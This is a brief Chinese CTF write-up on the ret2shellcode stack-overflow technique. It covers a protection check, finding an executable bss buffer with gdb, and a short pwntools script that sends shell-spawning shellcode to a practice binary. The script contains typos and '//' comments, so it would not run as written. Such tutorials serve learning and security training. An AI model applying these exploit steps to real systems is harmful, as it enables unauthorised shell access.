原理

ret2shellcode，即控制程序执行 shellcode代码。shellcode 指的是用于完成某个功能的汇编代码，常见的功能主要是获取目标系统的 shell。一般来说，shellcode 需要我们自己填充。这其实是另外一种典型的利用方法，即此时我们需要自己去填充一些可执行的代码。在栈溢出的基础上，要想执行 shellcode，需要对应的 binary 在运行时，shellcode 所在的区域具有可执行权限。

0x1

拿道题之后先查看它的保护机制

-> checksec shellcode

Arch:    i386-32-little

RELRO:    Partial RELRO

Stack:    No canary found

NX:      NX disabled

PIE:      No PIE (0x8048000)

RWX:      Has RWX segments

0x2

发现文件几乎没有开什么保护，并且具有可读可写可执行的段。程序是32位的，直接扔到32位IDA里

可能存在一个栈溢出的漏洞，我们就可以利用漏洞。简单分析程序发现还将输入到S地址的数据复制到buf2里面，点开buf2发现buff2在bass段，我们再去找system（“/bin/sh”）按shift+F12发现没有/bin/sh

0x3

我们先检测一下buff2在bass段是否具有可读可写的可执行的权限，如果有我们就讲shellcode写入拿到想到东西。

b main  //在main函数下断点

r

vmmap //查看权限

通过 vmmap，我们可以看到 bss 段对应的段具有可执行权限，那么这次我们就控制程序执行 shellcode，也就是读入 shellcode，然后控制程序执行 bss 段处的 shellcode。其中，相应的偏移计算类似于ret2text 中的例子。

exp如下

frorm pwn import*

p = process("./ret2shellcode")   

// r = remote('ip',端口)

shellcode = asm(shellcraft.sh()) 

//shellcode = asm(shellcraft.i386.linux.sh())

buf2 = 0x804a080

p.sendline(shellcode.ljust(112,'a') + p32(buf2))

p.interactive()

此篇文章如果存在问题，还望大佬批评指正